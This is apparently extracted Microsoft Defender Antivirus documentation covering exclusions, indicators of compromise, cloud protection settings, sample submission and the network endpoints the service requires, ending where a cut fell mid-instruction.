Windows Server Update Services
...and more.
７ Note
Automatic exclusions for server roles aren't supported on Windows Server 2012 R2.
For servers running Windows Server 2012 R2 with the Active Directory Domain
Services (AD DS) server role installed, exclusions for domain controllers must be
specified manually. See Active Directory exclusions.
For more information, see Automatic server role exclusions.
Built-in exclusions
Built-in exclusions include certain operating system files that are excluded by Microsoft
Defender Antivirus on all versions of Windows (including Windows 10, Windows 11, and
Windows Server).
Examples include:
%windir%\SoftwareDistribution\Datastore\*\Datastore.edb
%allusersprofile%\NTUser.pol
Windows Update files

Windows Security files
... and more.
The list of built-in exclusions in Windows is kept up to date as the threat landscape
changes. To learn more about these exclusions, see Microsoft Defender Antivirus
exclusions on Windows Server: Built-in exclusions.
Custom exclusions
Custom exclusions include files and folders that you specify. Exclusions for files, folders,
and processes will be skipped by scheduled scans, on-demand scans, and real-time
protection. Exclusions for process-opened files won't be scanned by real-time protection
but are still subject to quick, full, or on-demand antivirus scans.
Custom remediation actions

When Microsoft Defender Antivirus detects a potential threat while running a scan, it
attempts to remediate or remove the detected threat. You can define custom
remediation actions to configure how Microsoft Defender Antivirus should address
certain threats, whether a restore point should be created before remediating, and when
threats should be removed. Configure remediation actions for Microsoft Defender
Antivirus detections.
Defender for Endpoint indicators

You can define indicators with specific actions for entities, such as files, IP addresses,
URLs/domains, and certificates. In Defender for Endpoint, indicators are referred to as
Indicators of Compromise (IoCs), and less often, as custom indicators. When you define
your indicators, you can specify one of the following actions:
Allow – Defender for Endpoint won't block files, IP addresses, URLs/domains, or

certificates that have Allow indicators. (Use this action with caution.)
Audit – Files, IP addresses, and URLs/domains with Audit indicators are monitored,
and when they're accessed by users, informational alerts are generated in the
Microsoft Defender portal.
Block and Remediate – Files or certificates with Block and Remediate indicators are
blocked and quarantined when detected.
Block Execution – IP addresses and URLs/domains with Block Execution indicators

are blocked. Users can't access those locations.
Warn – IP addresses and URLs/domains with Warn indicators cause a warning

message to be displayed when a user attempts to access those locations. Users can
choose to bypass the warning and proceed to the IP address or URL/domain.
） Important
You can have up to 15,000 indicators in your tenant.
The following table summarizes IoC types and available actions:
ﾉ Expand table
Indicator type Available actions
Files - Allow
- Audit
Indicator type Available actions
- Warn
- Block execution
- Block and remediate
IP addresses and URLs/domains - Allow

- Audit
- Warn
- Block execution
Certificates - Allow
- Block and remediate
 Tip
See the following resources to learn more about indicators:
Create indicators
Create indicators for IP addresses and URLs/domains
Manage indicators
Attack surface reduction exclusions

Attack surface reduction rules (also known as ASR rules) target certain software
behaviors, such as:
Running scripts that seem to be obfuscated or otherwise suspicious
Performing behaviors that apps don't usually initiate during normal day-to-day
work
Sometimes, legitimate applications exhibit software behaviors that could be blocked by

attack surface reduction rules. If that's occurring in your organization, you can define
exclusions for certain files and folders. Such exclusions are applied to all attack surface
reduction rules. See Enable attack surface reduction rules.
Also note that while most ASR rules exclusions are independent from Microsoft
Defender Antivirus exclusions, some ASR rules do honor some Microsoft Defender
Antivirus exclusions. See Attack surface reduction rules reference - Microsoft Defender
Antivirus exclusions and ASR rules.
Controlled folder access exclusions
Controlled folder access monitors apps for activities that are detected as malicious and
protects the contents of certain (protected) folders on Windows devices. Controlled
folder access allows only trusted apps to access protected folders, such as common
system folders (including boot sectors) and other folders that you specify. You can allow
certain apps or signed executables to access protected folders by defining exclusions.
See Customize controlled folder access.
Automation folder exclusions

Automation folder exclusions apply to automated investigation and remediation in
Defender for Endpoint, which is designed to examine alerts and take immediate action
to resolve detected breaches. As alerts are triggered, and an automated investigation
runs, a verdict (Malicious, Suspicious, or No threats found) is reached for each piece of
evidence investigated. Depending on the automation level and other security settings,
remediation actions can occur automatically or only upon approval by your security
operations team.
You can specify folders, file extensions in a specific directory, and file names to be
excluded from automated investigation and remediation capabilities. Such automation
folder exclusions apply to all devices onboarded to Defender for Endpoint. These
exclusions are still subject to antivirus scans. See Manage automation folder exclusions.
How exclusions and indicators are evaluated

Most organizations have several different types of exclusions and indicators to
determine whether users should be able to access and use a file or process. Exclusions
and indicators are processed in a particular order so that policy conflicts are handled
systematically.
The following image summarizes how exclusions and indicators are handled across
Defender for Endpoint and Microsoft Defender Antivirus:

Here's how it works:
1. If a detected file/process isn't allowed by Windows Defender Application Control

and AppLocker, it's blocked. Otherwise, it proceeds to Microsoft Defender
Antivirus.
2. If the detected file/process isn't part of an exclusion for Microsoft Defender

Antivirus, it's blocked. Otherwise, Defender for Endpoint checks for a custom
indicator for the file/process.
3. If the detected file/process has a Block or Warn indicator, that action is taken.
Otherwise, the file/process is allowed, and proceeds to evaluation by attack surface
reduction rules, controlled folder access, and SmartScreen protection.
4. If the detected file/process isn't blocked by attack surface reduction rules,

controlled folder access, or SmartScreen protection, it proceeds to Microsoft
Defender Antivirus.
5. If the detected file/process isn't allowed by Microsoft Defender Antivirus, it's

checked for an action based on its threat ID.
How policy conflicts are handled

In cases where Defender for Endpoint indicators conflict, here's what to expect:
If there are conflicting file indicators, the indicator that uses the most secure hash
is applied. For example, SHA256 takes precedence over SHA-1, which takes
precedence over MD5.
If there are conflicting URL indicators, the more strict indicator is used. For
Microsoft Defender SmartScreen, an indicator that uses the longest URL path is
applied. For example, www.dom.ain/admin/ takes precedence over www.dom.ain .
(Network protection applies to domains, rather than subpages within a domain.)
If there are similar indicators for a file or process that have different actions, the
indicator that is scoped to a specific device group takes precedence over an
indicator that targets all devices.
How automated investigation and remediation

works with indicators
Automated investigation and remediation capabilities in Defender for Endpoint first
determine a verdict for each piece of evidence, and then take an action depending on
Defender for Endpoint indicators. Thus, a file/process could get a verdict of "good"
(which means no threats were found) and still be blocked if there's an indicator with that
action. Similarly, an entity could get a verdict of "bad" (which means it's determined to
be malicious) and still be allowed if there's an indicator with that action.
The following diagram shows how automated investigation and remediation works with
indicators:

Other server workloads and exclusions

If your organization is using other server workloads, such as Exchange Server, SharePoint
Server, or SQL Server, be aware that only built-in server roles (that could be
prerequisites for software you install later) on Windows Server are excluded by
automatic exclusions feature (and only when using their default installation location).
You'll likely need to define antivirus exclusions for these other workloads, or for all
workloads if you disable automatic exclusions.
Here are some examples of technical documentation to identify and implement the
exclusions you need:
Running antivirus software on Exchange Server

Folders to exclude from antivirus scans on SharePoint Server
Choosing antivirus software for SQL Server
Depending on what you're using, you might need to refer to the documentation for that
server workload.
 Tip
Performance tip Due to a variety of factors, Microsoft Defender Antivirus, like other
antivirus software, can cause performance issues on endpoint devices. In some
cases, you might need to tune the performance of Microsoft Defender Antivirus to
alleviate those performance issues. Microsoft's Performance analyzer is a
PowerShell command-line tool that helps determine which files, file paths,
processes, and file extensions might be causing performance issues; some
examples are:

Combinations, such as:
top scans per file
See also
Important points about exclusions
Common mistakes to avoid when defining exclusions
Blog post: The Hitchhiker's Guide to Microsoft Defender for Endpoint exclusions
 Tip
Feedback

Cloud protection and Microsoft
Defender Antivirus
Article • 11/06/2023
Applies to:

Platforms
Windows
Next-generation technologies in Microsoft Defender Antivirus provide near-instant,

automated protection against new and emerging threats. To identify new threats
dynamically, next-generation technologies work with large sets of interconnected data
in the Microsoft Intelligent Security Graph and powerful artificial intelligence (AI)
systems driven by advanced machine learning models. Cloud protection works together
with Microsoft Defender Antivirus to deliver accurate, real-time, and intelligent
protection.

 Tip
We recommend keeping cloud protection turned on. To learn more, see Why cloud
protection should be turned on.
How cloud protection works

Microsoft Defender Antivirus works seamlessly with Microsoft cloud services. These
cloud protection services, also referred to as Microsoft Advanced Protection Service
(MAPS), enhance standard real-time protection. With cloud protection, next-generation
technologies provide rapid identification of new threats, sometimes even before a single
endpoint is infected.
The following blog posts illustrate how cloud protection works:

Get to know the advanced technologies at the core of Microsoft Defender for
Endpoint next-generation protection
Why Microsoft Defender Antivirus is the most deployed in the enterprise
Behavior monitoring combined with machine learning spoils a massive coin-mining

campaign
How artificial intelligence stopped an "Emotet" outbreak
Detonating a bad rabbit: Microsoft Defender Antivirus and layered machine

learning defenses
Microsoft Defender Antivirus cloud protection service: Advanced real-time defense

against never-before-seen malware
７ Note
The Microsoft Defender Antivirus cloud service is a mechanism for delivering

updated protection to your network and endpoints. As a cloud service, it is not
simply protection for files stored in the cloud; instead, the cloud service uses
distributed resources and machine learning to deliver protection to your endpoints
at a rate that is far faster than traditional security intelligence updates.
How to get cloud protection

Cloud protection is enabled by default. However, you might need to re-enable it if it has
been disabled as part of previous organizational policies. To learn more, see Turn on
cloud protection.
If your subscription includes Windows 10 E5, you can take advantage of emergency
dynamic intelligence updates, which provide near real-time protection from emerging
threats. When you turn on cloud protection, fixes for malware issues can be delivered via
the cloud within minutes, instead of waiting for the next update. See Configure
Microsoft Defender Antivirus to automatically receive new protection updates based on
reports from our cloud service.
 Tip
Feedback

Turn on cloud protection in Microsoft
Defender Antivirus
Article • 05/24/2023
Applies to:

Platforms
Windows
Cloud protection in Microsoft Defender Antivirus delivers accurate, real-time, and

intelligent protection. Cloud protection should be enabled by default.
７ Note
Tamper protection helps keep cloud protection and other security settings from
being changed. As a result, when tamper protection is enabled, any changes made
to tamper-protected settings are ignored. If you must make changes to a device
and those changes are blocked by tamper protection, we recommend using
troubleshooting mode to temporarily disable tamper protection on the device.
Note that after troubleshooting mode ends, any changes made to tamper-
protected settings are reverted to their configured state.
Why cloud protection should be turned on

Microsoft Defender Antivirus cloud protection helps protect against malware on your
endpoints and across your network. We recommend keeping cloud protection turned
on, because certain security features and capabilities in Microsoft Defender for Endpoint
only work when cloud protection is enabled.
The following table summarizes the features and capabilities that depend on cloud
protection:
ﾉ Expand table
Feature/Capability Subscription Description

requirement
Checking against metadata in the cloud. The Microsoft Microsoft Defender

Defender Antivirus cloud service uses machine learning for Endpoint Plan 1
models as an extra layer of defense. These machine learning or Plan 2
models include metadata, so when a suspicious or (Standalone or
malicious file is detected, its metadata is checked. included in a plan
like Microsoft 365
To learn more, see Blog: Get to know the advanced E3 or E5)
technologies at the core of Microsoft Defender for Endpoint
next-generation protection
requirement
Cloud protection and sample submission. Files and Microsoft Defender

executables can be sent to the Microsoft Defender Antivirus for Endpoint Plan 1
cloud service for detonation and analysis. Automatic sample or Plan 2
submission relies on cloud protection, although it can also (Standalone or
be configured as a standalone setting. included in a plan
like Microsoft 365
To learn more, see Cloud protection and sample submission E3 or E5)
in Microsoft Defender Antivirus.
Tamper protection. Tamper protection helps protect Microsoft Defender

against unwanted changes to your organization's security for Endpoint Plan 2
settings. (Standalone or
included in a plan
To learn more, see Protect security settings with tamper like Microsoft 365
protection. E5)
Block at first sight Microsoft Defender

Block at first sight detects new malware and blocks it within for Endpoint Plan 1
seconds. When a suspicious or malicious file is detected, or Plan 2
block at first sight capabilities queries the cloud protection (Standalone or
backend and applies heuristics, machine learning, and included in a plan
automated analysis of the file to determine whether it is a like Microsoft 365
threat. E3 or E5)
To learn more, see What is "block at first sight"?
Emergency signature updates. When malicious content is Microsoft Defender

detected, emergency signature updates and fixes are for Endpoint Plan 2
deployed. Rather than wait for the next regular update, you (Standalone or
can receive these fixes and updates within minutes. included in a plan
like Microsoft 365
To learn more about updates, see Microsoft Defender E5)
Antivirus security intelligence and product updates.
Endpoint detection and response (EDR) in block mode. Microsoft Defender

EDR in block mode provides extra protection when for Endpoint Plan 2
Microsoft Defender Antivirus isn't the primary antivirus (Standalone or
product on a device. EDR in block mode remediates included in a plan
artifacts found during EDR-generated scans that the non- like Microsoft 365
Microsoft, primary antivirus solution might have missed. E5)
When enabled for devices with Microsoft Defender
Antivirus as the primary antivirus solution, EDR in block
mode provides the added benefit of automatically
remediating artifacts identified during EDR-generated
scans.
To learn more, see EDR in block mode.

requirement
Attack surface reduction rules. ASR rules are intelligent Microsoft Defender
rules that you can configure to help stop malware. Certain for Endpoint Plan 1
rules require cloud protection to be turned on in order to or Plan 2
function fully. These rules include: (Standalone or
- Block executable files from running unless they meet a included in a plan
prevalence, age, or trusted list criteria like Microsoft 365
- Use advanced protection against ransomware E3 or E5)
- Block untrusted programs from running from removable
drives
To learn more, see Use attack surface reduction rules to

prevent malware infection.
Indicators of compromise (IoCs). In Defender for Endpoint, Microsoft Defender

IoCs can be configured to define the detection, prevention, for Endpoint Plan 2
and exclusion of entities. Examples: (Standalone or
"Allow" indicators can be used to define exceptions to included in a plan
antivirus scans and remediation actions. like Microsoft 365
"Alert and block" indicators can be used to prevent files or E5)
processes from executing.
To learn more, see Create indicators.
Methods to configure cloud protection

You can turn Microsoft Defender Antivirus cloud protection on or off by using one of
several methods, such as:
Microsoft Intune
Group Policy
PowerShell cmdlets
Windows Management Instruction (WMI)
You can also use Configuration Manager. And, you can turn cloud protection on or off
on individual endpoints by using the Windows Security app.
For more information about the specific network-connectivity requirements to ensure

your endpoints can connect to the cloud protection service, see Configure and validate
network connections.
７ Note
In Windows 10 and Windows 11, there is no difference between the Basic and
Advanced reporting options described in this article. This is a legacy distinction and
choosing either setting results in the same level of cloud protection. There is no
difference in the type or amount of information that is shared. For more
information on what we collect, see the Microsoft Privacy Statement .
Use Microsoft Intune to turn on cloud

protection
1. Go to the Intune admin center (https://intune.microsoft.com ) and sign in.
2. Choose Endpoint security > Antivirus.
3. In the AV policies section, either select an existing policy, or choose + Create

Policy.
ﾉ Expand table
Task Steps
Create a new 1. For Platform, select Windows 10, Windows 11, and Windows Server.
policy
2. For Profile, select Microsoft Defender Antivirus.
3. On the Basics page, specify a name and description for the policy, and
then choose Next.
4. In the Defender section, find Allow Cloud Protection, and set it to

Allowed. Then choose Next.
5. Scroll down to Submit Samples Consent, and select one of the

following settings:
- Send all samples automatically
- Send safe samples automatically
6. On the Scope tags step, if your organization is using scope tags, select
the tags you want to use, and then choose Next.
7. On the Assignments step, select the groups, users, or devices that you
want to apply this policy to, and then choose Next.
8. On the Review + create step, review the settings for your policy, and
then choose Create.
Task Steps
Edit an existing 1. Select the policy that you want to edit.

policy
2. Under Configuration settings, choose Edit.
3. In the Defender section, find Allow Cloud Protection, and set it to

Allowed.
4. Scroll down to Submit Samples Consent, and select one of the

following settings:
- Send all samples automatically
- Send safe samples automatically
5. Select Review + save.
 Tip
To learn more about Microsoft Defender Antivirus settings in Intune, see Antivirus
policy for endpoint security in Intune.
Use Group Policy to turn on cloud protection

3. Select Administrative templates.
MAPS
７ Note
MAPS settings are equal to cloud-delivered protection.
5. Double-click Join Microsoft MAPS. Ensure the option is turned on and set to Basic
MAPS or Advanced MAPS. Select OK.
You can choose to send basic or additional information about detected software:
Basic MAPS: Basic membership sends basic information to Microsoft about
malware and potentially unwanted software that has been detected on your
device. Information includes where the software came from (like URLs and
partial paths), the actions taken to resolve the threat, and whether the actions
were successful.
Advanced MAPS: In addition to basic information, advanced membership

sends detailed information about malware and potentially unwanted
software, including the full path to the software, and detailed information
about how the software has affected your device.
6. Double-click Send file samples when further analysis is required. Ensure that the
first option is set to Enabled and that the other options are set to either:
Send safe samples (1)

Send all samples (3)
７ Note
The Send safe samples (1) option means that most samples are sent
automatically. Files that are likely to contain personal information prompt the
user for additional confirmation. Setting the option to Always Prompt (0)
lowers the protection state of the device. Setting it to Never send (2) means
that the Block at First Sight feature of Microsoft Defender for Endpoint won't
work.
7. Select OK.
Use PowerShell cmdlets to turn on cloud

protection
The following cmdlets can turn on cloud protection:
PowerShell
Set-MpPreference -MAPSReporting Advanced

Set-MpPreference -SubmitSamplesConsent SendAllSamples
For more information on how to use PowerShell with Microsoft Defender Antivirus, see
Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and
Microsoft Defender Antivirus cmdlets. Policy CSP - Defender also has more information
specifically on -SubmitSamplesConsent.
） Important
You can set -SubmitSamplesConsent to SendSafeSamples (the default,

recommended setting), NeverSend , or AlwaysPrompt . The SendSafeSamples setting
means that most samples are sent automatically. Files that are likely to contain
personal information result in a prompt for the user to continue, and require
confirmation. The NeverSend and AlwaysPrompt settings lower the protection level
of the device. Furthermore, the NeverSend setting means that the Block at First
Sight feature of Microsoft Defender for Endpoint won't work.
Use Windows Management Instruction (WMI)

to turn on cloud protection
Use the Set method of the MSFT_MpPreference class for the following properties:
WMI
MAPSReporting
SubmitSamplesConsent
For more information about allowed parameters, see Windows Defender WMIv2 APIs
Turn on cloud protection on individual clients

with the Windows Security app
７ Note
If the Configure local setting override for reporting Microsoft MAPS Group Policy
setting is set to Disabled, then the Cloud-based protection setting in Windows
Settings are greyed out and unavailable. Changes made through a Group Policy
Object must first be deployed to individual endpoints before the setting is updated
in Windows Settings.
1. Open the Windows Security app by selecting the shield icon in the task bar, or by
2. Select the Virus & threat protection tile (or the shield icon on the left menu bar),
and then, under Virus & threat protection settings, select Manage settings.
3. Confirm that Cloud-based Protection and Automatic sample submission are

switched to On.
７ Note
If automatic sample submission has been configured with Group Policy, then
the setting is greyed out and unavailable.
See also
Use Microsoft cloud protection in Microsoft Defender Antivirus
Configuration Manager: Microsoft Defender for Endpoint
Use PowerShell cmdlets to manage Microsoft Defender Antivirus
 Tip

 Tip
Feedback

Specify the cloud protection level
Article • 07/18/2023
Applies to:

Platforms
Windows
Cloud protection works together with Microsoft Defender Antivirus to deliver protection
to your devices faster than through traditional security intelligence updates. You can
configure your level of cloud protection by using Microsoft Intune (recommended) or
Group Policy.
Use Microsoft Intune to specify the level of

cloud protection
1. Go to the Microsoft Intune admin center (https://endpoint.microsoft.com ) and
sign in.
3. Select an antivirus profile. If you don't have one yet, or if you want to create a new
profile, see Configure device restriction settings in Microsoft Intune.
4. Select Properties. Then, next to Configuration settings, choose Edit.
5. Expand Cloud protection, and then in the Cloud-delivered protection level list,
select one of the following:
Not configured: Default state.

High: Applies a strong level of detection.
High plus: Uses the High level and applies extra protection measures (might
affect client performance).
Zero tolerance: Blocks all unknown executables.

 Tip
Need some help? See the following resources:
Manage device security with endpoint security policies in Microsoft Intune

Configure Endpoint Protection (Configuration Manager)
Use Group Policy to specify the level of cloud

protection
1. On your Group Policy management machine, open the Group Policy Management
Console.
3. In the Group Policy Management Editor, go to Computer Configuration >

4. Expand the tree to Windows Components > Microsoft Defender Antivirus >
MpEngine.
5. Double-click the Select cloud protection level setting, and set it to Enabled.
6. Under Select cloud blocking level, set the level of protection:
Default blocking level provides strong detection without increasing the risk
of detecting legitimate files.
Moderate blocking level provides moderate only for high confidence
detections
High blocking level applies a strong level of detection while optimizing client
performance (but can also give you a greater chance of false positives).
High + blocking level applies extra protection measures (might affect client
performance and increase your chance of false positives).
Zero tolerance blocking level blocks all unknown executables.
Ｕ Caution
If you're using Resultant Set of Policy with Group Policy (RSOP), and Default
blocking level is selected, it can produce misleading results, as a setting with
a 0 value is read as disabled by RSOP. You can instead confirm the registry
key is present in
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
Defender\MpEngine or use GPresult.
7. Select OK.
8. Deploy your updated Group Policy Object. See Group Policy Management Console
 Tip
Are you using Group Policy Objects on premises? See how they translate in the
cloud. Analyze your on-premises group policy objects using Group Policy
analytics in Microsoft Intune.
See also
Onboard non-Windows devices to Defender for Endpoint
Turn on cloud protection in Microsoft Defender Antivirus
 Tip
Feedback

Cloud protection and sample
submission at Microsoft Defender
Antivirus
Article • 02/21/2024
Applies to:

Platforms
Windows
macOS
Linux
Windows Server
Microsoft Defender Antivirus uses many intelligent mechanisms for detecting malware.
One of the most powerful capabilities is the ability to apply the power of the cloud to
detect malware and perform rapid analysis. Cloud protection and automatic sample
submission work together with Microsoft Defender Antivirus to help protect against new
and emerging threats.
If a suspicious or malicious file is detected, a sample is sent to the cloud service for
analysis while Microsoft Defender Antivirus blocks the file. As soon as a determination is
made, which happens quickly, the file is either released or blocked by Microsoft
Defender Antivirus.
This article provides an overview of cloud protection and automatic sample submission
at Microsoft Defender Antivirus. To learn more about cloud protection, see Cloud
protection and Microsoft Defender Antivirus.
How cloud protection and sample submission

work together
To understand how cloud protection works together with sample submission, it can be
helpful to understand how Defender for Endpoint protects against threats. The
Microsoft Intelligent Security Graph monitors threat data from a vast network of sensors.
Microsoft layers cloud-based machine-learning models that can assess files based on
signals from the client and the vast network of sensors and data in the Intelligent
Security Graph. This approach gives Defender for Endpoint the ability to block many
never-before-seen threats.
The following image depicts the flow of cloud protection and sample submission with
Microsoft Defender Antivirus:
Microsoft Defender Antivirus and cloud protection automatically block most new, never-
before-seen threats at first sight by using the following methods:
1. Lightweight client-based machine-learning models, blocking new and unknown

malware.
2. Local behavioral analysis, stopping file-based and file-less attacks.

3. High-precision antivirus, detecting common malware through generic and heuristic
techniques.
4. Advanced cloud-based protection is provided for cases when Microsoft Defender

Antivirus running on the endpoint needs more intelligence to verify the intent of a
suspicious file.
a. In the event Microsoft Defender Antivirus can't make a clear determination, file
metadata is sent to the cloud protection service. Often within milliseconds, the
cloud protection service can determine based on the metadata as to whether
the file is malicious or not a threat.
The cloud query of file metadata can be a result of behavior, mark of the
web, or other characteristics where a clear verdict isn't determined.
A small metadata payload is sent, with the goal of reaching a verdict of
malware or not a threat. The metadata doesn't include personally
identifiable information (PII). Information such as filenames, are hashed.
Can be synchronous or asynchronous. For synchronous, the file won't
open until the cloud renders a verdict. For asynchronous, the file opens
while cloud protection performs its analysis.
Metadata can include PE attributes, static file attributes, dynamic and
contextual attributes, and more (see Examples of metadata sent to the
cloud protection service).
b. After examining the metadata, if Microsoft Defender Antivirus cloud protection

can't reach a conclusive verdict, it can request a sample of the file for further
inspection. This request honors the settings configuration for sample
submission:
i. Send safe samples automatically
Safe samples are samples considered to not commonly contain PII data
like: .bat, .scr, .dll, .exe.
If file is likely to contain PII, the user gets a request to allow file sample
submission.
This option is the default on Windows, macOS, and Linux.
ii. Always Prompt
If configured, the user is always prompted for consent before file

submission
This setting isn't available in macOS and Linux cloud protection
iii. Send all samples automatically

If configured, all samples are sent automatically
If you would like sample submission to include macros embedded in
Word docs, you must choose "Send all samples automatically"
This setting isn't available on macOS cloud protection
iv. Do not send
Prevents "block at first sight" based on file sample analysis

"Don't send" is the equivalent to the "Disabled" setting in macOS policy
and "None" setting in Linux policy.
Metadata is sent for detections even when sample submission is
disabled
c. After files are submitted to cloud protection, the submitted files can be
scanned, detonated, and processed through big data analysis machine-
learning models to reach a verdict. Turning off cloud-delivered protection limits
analysis to only what the client can provide through local machine-learning
models, and similar functions.
） Important
Block at first sight (BAFS) provides detonation and analysis to determine whether a
file or process is safe. BAFS can delay the opening of a file momentarily until a
verdict is reached. If you disable sample submission, BAFS is also disabled, and file
analysis is limited to metadata only. We recommend keeping sample submission
and BAFS enabled. To learn more, see What is "block at first sight"?
Cloud protection levels

Cloud protection is enabled by default at Microsoft Defender Antivirus. We recommend
that you keep cloud protection enabled, although you can configure the protection level
for your organization. See Specify the cloud-delivered protection level for Microsoft
Defender Antivirus.
Sample submission settings

In addition to configuring your cloud protection level, you can configure your sample
submission settings. You can choose from several options:
Send safe samples automatically (the default behavior)

Send all samples automatically
Do not send samples
 Tip
Using the Send all samples automatically option provides for better security,
because phishing attacks are used for a high amount of initial access attacks . For
information about configuration options using Intune, Configuration Manager,
Group Policy, or PowerShell, see Turn on cloud protection at Microsoft Defender
Antivirus.
Examples of metadata sent to the cloud

protection service
The following table lists examples of metadata sent for analysis by cloud protection:
ﾉ Expand table
Type Attribute
Machine attributes OS version

Processor
Security settings
Dynamic and contextual attributes Process and installation

ProcessName
ParentProcess
TriggeringSignature
TriggeringFile
Download IP and url
HashedFullPath
Vpath
RealPath
Parent/child relationships
Type Attribute
Behavioral
Connection IPs
System changes
API calls
Process injection
Locale
Locale setting
Geographical location
Static file attributes Partial and full hashes

ClusterHash
Crc16
Ctph
ExtendedKcrcs
ImpHash
Kcrc3n
Lshash
LsHashs
PartialCrc1
PartialCrc2
PartialCrc3
Sha1
Sha256
File properties
FileName
FileSize
Signer information
AuthentiCodeHash
Issuer
IssuerHash
Publisher
Signer
SignerHash
Samples are treated as customer data

Just in case you're wondering what happens with sample submissions, Defender for
Endpoint treats all file samples as customer data. Microsoft honors both the
geographical and data retention choices your organization selected when onboarding
to Defender for Endpoint.
In addition, Defender for Endpoint has received multiple compliance certifications,
demonstrating continued adherence to a sophisticated set of compliance controls:
ISO 27001
ISO 27018
SOC I, II, III
PCI
For more information, see the following resources:
Azure Compliance Offerings

Service Trust Portal
Microsoft Defender for Endpoint data storage and privacy
Other file sample submission scenarios

There are two more scenarios where Defender for Endpoint might request a file sample
that isn't related to the cloud protection at Microsoft Defender Antivirus. These
scenarios are described in the following table:
ﾉ Expand table
Manual file sample When onboarding devices to Defender for Endpoint, you can configure
collection in the settings for endpoint detection and response (EDR). For example, there's a
Microsoft Defender setting to enable sample collections from the device, which can easily be
portal confused with the sample submission settings described in this article.
The EDR setting controls file sample collection from devices when
requested through the Microsoft Defender portal, and is subject to the
roles and permissions already established. This setting can allow or block
file collection from the endpoint for features such as deep analysis in the
Microsoft Defender portal. If this setting isn't configured, the default is to
enable sample collection.
Learn about Defender for Endpoint configuration settings, see:

Onboarding tools and methods for Windows 10 devices in Defender for
Endpoint
Automated When automated investigations are running on devices (when configured

investigation and to run automatically in response to an alert or manually run), files that are
response content identified as suspicious can be collected from the endpoints for further
analysis inspection. If necessary, the file content analysis feature for automated
investigations can be disabled in the Microsoft Defender portal.
The file extension names can also be modified to add or remove

extensions for other file types that will be automatically submitted during
an automated investigation.
To learn more, see Manage automation file uploads.
 Tip

See also
Next-generation protection overview
Configure remediation for Microsoft Defender Antivirus detections.
 Tip
Feedback

Configure and validate Microsoft
Defender Antivirus network connections
Article • 06/26/2023
Applies to:

Platforms
Windows
To ensure Microsoft Defender Antivirus cloud-delivered protection works properly, your

security team must configure your network to allow connections between your
endpoints and certain Microsoft servers. This article lists connections that must be
allowed for using the firewall rules. It also provides instructions for validating your
connection. Configuring your protection properly will ensure you receive the best value
from your cloud-delivered protection services.
） Important
This article contains information about configuring network connections only for
Microsoft Defender Antivirus. If you are using Microsoft Defender for Endpoint
(which includes Microsoft Defender Antivirus), see Configure device proxy and
Internet connectivity settings for Defender for Endpoint.
Allow connections to the Microsoft Defender

Antivirus cloud service
The Microsoft Defender Antivirus cloud service provides fast, and strong protection for
your endpoints. It's optional to enable the cloud-delivered protection service. Microsoft
Defender Antivirus cloud service is recommended, because it provides important
protection against malware on your endpoints and network. For more information, see
Enable cloud-delivered protection for enabling service with Intune, Microsoft Endpoint
Configuration Manager, Group Policy, PowerShell cmdlets, or individual clients in the
After you've enabled the service, you need to configure your network or firewall to allow
connections between network and your endpoints. Because your protection is a cloud
service, computers must have access to the internet and reach the Microsoft cloud
services. Don't exclude the URL *.blob.core.windows.net from any kind of network
inspection.
７ Note
The Microsoft Defender Antivirus cloud service delivers updated protection to your
network and endpoints. The cloud service should not be considered as only
protection for your files that are stored in the cloud; instead, the cloud service uses
distributed resources and machine learning to deliver protection for your endpoints
at a faster rate than the traditional Security intelligence updates.
Services and URLs

The table in this section lists services and their associated website addresses (URLs).
Make sure that there are no firewall or network filtering rules denying access to these
URLs. Otherwise, you must create an allow rule specifically for those URLs (excluding the
URL *.blob.core.windows.net ). The URLs in the following table use port 443 for
communication. (Port 80 is also required for some URLs, as noted in the following table.)
ﾉ Expand table
Service and URL

description
Microsoft Defender *.wdcp.microsoft.com

Antivirus cloud- *.wdcpalt.microsoft.com
delivered *.wd.microsoft.com
protection service
is referred to as
Microsoft Active
Protection Service
(MAPS).
Microsoft Defender
Antivirus uses the
MAPS service to
provide cloud-
delivered
protection.
Service and URL
description
Microsoft Update *.update.microsoft.com

Service (MU) and *.delivery.mp.microsoft.com
Windows Update *.windowsupdate.com
Service (WU) ctldl.windowsupdate.com
These services will
allow security For more information, see Connection endpoints for Windows Update.
intelligence and
product updates.
Security *.download.microsoft.com
intelligence *.download.windowsupdate.com (Port 80 is required)
updates Alternate go.microsoft.com (Port 80 is required)
Download Location https://www.microsoft.com/security/encyclopedia/adlpackages.aspx
(ADL) https://definitionupdates.microsoft.com/download/DefinitionUpdates/
This is an alternate https://fe3cr.delivery.mp.microsoft.com/ClientWebService/client.asmx
location for
Microsoft Defender
Antivirus Security
intelligence
updates, if the
installed Security
intelligence is out
of date (Seven or
more days behind).
Malware ussus1eastprod.blob.core.windows.net
submission storage ussus2eastprod.blob.core.windows.net
This is an upload ussus3eastprod.blob.core.windows.net
location for files ussus4eastprod.blob.core.windows.net
submitted to wsus1eastprod.blob.core.windows.net
Microsoft via the wsus2eastprod.blob.core.windows.net
Submission form ussus1westprod.blob.core.windows.net
or automatic ussus2westprod.blob.core.windows.net
sample submission.
usseu1northprod.blob.core.windows.net
wseu1northprod.blob.core.windows.net
usseu1westprod.blob.core.windows.net
wseu1westprod.blob.core.windows.net
ussuk1southprod.blob.core.windows.net
wsuk1southprod.blob.core.windows.net
ussuk1westprod.blob.core.windows.net
wsuk1westprod.blob.core.windows.net
Service and URL
description
Certificate http://www.microsoft.com/pkiops/crl/
Revocation List http://www.microsoft.com/pkiops/certs
(CRL) http://crl.microsoft.com/pki/crl/products
Windows use this http://www.microsoft.com/pki/certs
list while creating
the SSL connection
to MAPS for
updating the CRL.
Universal GDPR The update uses SSL (TCP Port 443) to download manifests and upload
Client diagnostic data to Microsoft that uses the following DNS endpoints:
Windows use this vortex-win.data.microsoft.com
client to send the settings-win.data.microsoft.com
client diagnostic
data.
Microsoft Defender
Antivirus uses
General Data
Protection
Regulation for
product quality,
and monitoring
purposes.
Validate connections between your network

and the cloud
After allowing the URLs listed, test whether you're connected to the Microsoft Defender
Antivirus cloud service. Test the URLs are correctly reporting and receiving information
to ensure you're fully protected.
Use the cmdline tool to validate cloud-delivered

protection
Use the following argument with the Microsoft Defender Antivirus command-line utility
( mpcmdrun.exe ) to verify that your network can communicate with the Microsoft
Defender Antivirus cloud service:
Console
"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -ValidateMapsConnection
７ Note
Open Command Prompt as an administrator. Right-click the item in the Start

